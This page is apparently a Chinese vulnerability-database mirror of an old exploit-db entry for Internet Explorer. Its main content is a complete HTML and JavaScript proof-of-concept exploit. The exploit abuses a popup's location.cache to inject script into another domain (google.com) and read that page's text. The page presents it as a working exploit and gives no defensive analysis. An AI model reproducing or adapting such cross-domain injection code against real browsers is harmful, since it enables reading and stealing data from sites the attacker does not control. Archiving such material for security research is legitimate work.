Microsoft Internet Explorer – Overly Trusted Location Cache

Microsoft Internet Explorer – Overly Trusted Location Cache

漏洞ID 1054529 漏洞类型
发布时间 2004-07-18 更新时间 2004-07-18
图片[1]-Microsoft Internet Explorer – Overly Trusted Location Cache-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer – Overly Trusted Location Cache-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/354
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<html>
<body>
<b><font size="5">Overly Trusted Location Variant Method Cache Vulnerability</font></b>
<br><br>
<a href="#refresh" onclick="setTimeout('document.execCommand('Refresh')',1000);"><font size=4 color=red>GO!</font></a><br><
+br>
This vulnerability seems to be unstable. For some reason, it crashes my internet explorer unless the exploit is executed onlo
+ad and even then it crashes sometimes.
<br><br>

<script>

var w=window.open("javascript:''","_blank","width=100,height=100,left=300,top=300");
var cpop=w.createPopup();
w.location.assign("http://google.com");
cpop.document.body.innerHTML='<button onactivate="document.parentWindow.location.cache=parent.open;var myint=setInterval(func
+tion(){try{var testvar=parent.document.write;}catch(e){clearInterval(myint);document.parentWindow.location.cache('javascrip
+t:alert(\'Javascript injected!\'+document.body.innerText)','_self')}},1000 /* theres some ratio of this number to the
+ chance of internet explorer crashing at offset 0019d19d :) */);"></button>';
cpop.show(1,1,1,1);

</script>
</body>
</html>


// milw0rm.com [2004-07-18]

相关推荐: Cisco Personal Assistant Web Interface User Password Bypass Vulnerability

Cisco Personal Assistant Web Interface User Password Bypass Vulnerability 漏洞ID 1099059 漏洞类型 Access Validation Error 发布时间 2004-01-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享